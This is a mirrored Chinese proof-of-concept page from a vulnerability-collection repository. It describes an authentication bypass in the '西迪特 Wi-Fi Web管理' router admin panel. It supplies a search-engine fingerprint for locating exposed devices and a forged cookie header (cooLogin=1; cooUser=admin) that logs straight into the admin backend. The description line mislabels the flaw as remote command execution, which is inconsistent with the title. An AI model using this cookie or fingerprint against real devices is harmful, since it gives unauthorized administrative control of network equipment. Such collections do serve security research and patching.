mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 20:06:03 +00:00
31 lines
489 B
Markdown
31 lines
489 B
Markdown
|
|
# 西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
西迪特 Wi-Fi Web管理
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title=="Wi-Fi Web管理"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现o
|
|||
|
|
|
|||
|
|
登录页面
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
添加Cookie,即可登录后台
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Cookie: timestamp=0; cooLogin=1; cooUser=admin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|